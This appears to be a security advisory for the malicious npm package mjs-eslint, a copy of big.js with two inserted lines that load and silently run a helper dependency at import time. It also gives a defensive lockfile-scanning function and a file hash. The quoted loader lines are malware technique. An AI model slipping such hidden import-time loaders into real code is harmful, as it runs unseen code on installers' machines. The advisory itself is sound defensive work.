Malicious package

mjs-eslint (npm)

Malicious code in mjs-eslint (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6223
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall mjs-eslint

What this malware does

The package is published as 'mjs-eslint', but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606):

    const helper = require("ts-eslint-helper");
    helper.from_str().then(e => e).catch(e => { });

The corresponding dependency "ts-eslint-helper": "^4.0.1" is declared in package.json. This call fires at module load on any require('mjs-eslint') or import of the package, executes asynchronously, and silently swallows all errors via .catch(()=>{}).

An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init. The name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners.

Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.

Malicious versions

1 flagged
7.0.5
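
One way to check a project for this package, as an added example that is not part of the advisory or of any vendor tooling: the function below walks a parsed package-lock.json and reports where mjs-eslint or ts-eslint-helper is installed and which package declares it. The function names and the sample lockfile are constructed for illustration, and the code goes slightly beyond the advisory by covering both the lockfileVersion 1 tree and the lockfileVersion 2/3 packages map.

```javascript
// Added example (not advisory code): find the advisory's package names in a parsed lockfile.
const FLAGGED = new Map([ // a Map, so names like "constructor" cannot match via the prototype
  ["mjs-eslint", "host package named in the advisory (7.0.5 flagged)"],
  ["ts-eslint-helper", "dependency mjs-eslint loads at module init"],
]);

// v2/v3 lockfiles key entries by install path, e.g. "node_modules/a/node_modules/b".
const nameFromPath = (p) =>
  p.includes("node_modules/") ? p.split("node_modules/").pop() : null;

function findFlagged(lock) {
  const hits = [];
  const record = (name, version, where, declared) => {
    if (FLAGGED.has(name)) hits.push({ kind: "installed", name, version, where });
    for (const dep of Object.keys(declared || {})) {
      if (FLAGGED.has(dep)) hits.push({ kind: "declared", name: dep, by: name || "(root project)", where });
    }
  };
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      // meta.name is set when the folder name differs (npm alias), so prefer it over the path.
      const declared = { ...meta.dependencies, ...meta.devDependencies, ...meta.optionalDependencies };
      record(meta.name || nameFromPath(path), meta.version, path || ".", declared);
    }
  } else {
    // lockfileVersion 1: nested "dependencies" tree, declared ranges under "requires".
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const where = trail.concat(name).join(" > ");
        record(name, meta.version, where, meta.requires);
        walk(meta.dependencies, trail.concat(name));
      }
    };
    walk(lock.dependencies, []);
  }
  return hits;
}

// Constructed sample lockfile (lockfileVersion 3 shape); versions other than 7.0.5 are made up.
const sample = { packages: {
  "": { name: "demo-app", dependencies: { "mjs-eslint": "^7.0.5" } },
  "node_modules/mjs-eslint": { version: "7.0.5", dependencies: { "ts-eslint-helper": "^4.0.1" } },
  "node_modules/ts-eslint-helper": { version: "4.0.1" },
  "node_modules/big.js": { version: "6.2.1" },
} };
console.log(findFlagged(sample));
```

Pass it the result of JSON.parse on your own package-lock.json; an empty result only means neither name is pinned in that lockfile.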

Indicators of compromise (SHA-256)

51c6776509c718cebce5fe0ef0f5be73ede28f3be69888bfadff198f25ac2df6

Frequently asked questions

No. mjs-eslint on npm has been identified as a malicious package (version 7.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007069

Credits

  • Amazon Inspector · finder

mjs-eslint (npm) malicious package — MAL-2026-6223 | O3 Security